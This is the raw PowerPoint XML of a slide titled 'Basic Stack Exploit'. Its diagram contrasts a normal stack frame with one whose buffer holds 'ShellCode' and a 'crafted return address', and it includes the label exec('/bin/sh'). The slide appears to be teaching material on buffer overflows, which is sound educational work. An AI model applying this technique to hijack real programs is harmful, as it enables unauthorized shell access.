                          <a:schemeClr val="accent1">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="16200000" scaled="0"/>
                      <a:tileRect/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="648006">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>arguments</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272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>return address</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272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> frame pointer</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388802">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="0"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432003">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buffer</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272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="0"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76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="702004">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solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="0"/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="19" name="Table 18"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4668705" y="1797344"/>
          <a:ext cx="2418868" cy="3781141"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2418868"/>
              </a:tblGrid>
              <a:tr h="723601">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rgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="648006">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r>
              <a:tr h="272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>crafted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>return address</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="CCFFCC"/>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r>
              <a:tr h="272924">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r>
              <a:tr h="388802">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r>
              <a:tr h="432003">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="CCFFCC"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ShellCode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="CCFFCC"/>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2">
                              <a:lumMod val="60000"/>
                              <a:lumOff val="40000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exec("/bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2">
                              <a:lumMod val="60000"/>
                              <a:lumOff val="40000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2">
                              <a:lumMod val="60000"/>
                              <a:lumOff val="40000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>”)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="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r>
              <a:tr h="272924">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76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="702004">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solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="0"/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic Stack Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6104185" y="1756556"/>
            <a:ext cx="2613522" cy="3771873"/>
            <a:chOff x="664034" y="1756556"/>
            <a:chExt cx="2613522" cy="3771873"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="664034" y="3125108"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="39" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="973377" y="3893777"/>
              <a:ext cx="1215059" cy="132349"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -317"/>
                <a:gd name="adj2" fmla="val 447954"/>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675335" y="2258314"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2415557" y="5159097"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2305813" y="1756556"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6193870" y="1411598"/>
            <a:ext cx="4228322" cy="4143791"/>
            <a:chOff x="6146840" y="1380239"/>
            <a:chExt cx="4228322" cy="4143791"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44" name="Group 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6146840" y="1380239"/>
              <a:ext cx="3859159" cy="2855798"/>
              <a:chOff x="6146840" y="1380239"/>
              <a:chExt cx="3859159" cy="2855798"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="TextBox 25"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6146840" y="1380239"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="29" name="Elbow Connector 28"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="26" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="7008839" y="1564905"/>
                <a:ext cx="20062" cy="2027114"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -1139463"/>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166902" y="3407353"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="TextBox 30"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7151235" y="1897181"/>
                <a:ext cx="1449661" cy="523220"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t>To previous stack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t> frame pointer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="36" name="Elbow Connector 35"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="39" idx="3"/>
                <a:endCxn id="38" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7040202" y="3321062"/>
                <a:ext cx="844424" cy="45331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210164" y="3774372"/>
                <a:ext cx="1348923" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>To  the instruction following call site</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="TextBox 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6178203" y="3136396"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="TextBox 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9144000" y="3523994"/>
                <a:ext cx="861999" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9513163" y="5154698"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9403419" y="1752157"/>
              <a:ext cx="861999" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Table 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="185908" y="1777264"/>
          <a:ext cx="2418868" cy="3723442"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2418868"/>
              </a:tblGrid>
              <a:tr h="723601">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crgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:gradFill flip="none" rotWithShape="1">
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="16200000" scaled="0"/>
                      <a:tileRect/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="648006">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>arguments</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272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>return address</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272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>stack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> frame pointer</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388802">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="0"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432003">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buffer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1"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r>
              <a:tr h="272924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="702004">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="85000"/>
                          </a:schemeClr>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="62982" marR="62982" marT="31491" marB="31491" anchor="ctr">
                    <a:lnL w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="76200" cap="flat" cmpd="sng" algn="ctr">
                      <a:noFill/>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="0">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent1">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="5400000" scaled="0"/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1726756" y="1360159"/>
            <a:ext cx="4118578" cy="4143791"/>
            <a:chOff x="6146840" y="1380239"/>
            <a:chExt cx="4118578" cy="4143791"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6146840" y="1380239"/>
              <a:ext cx="3859159" cy="3053570"/>
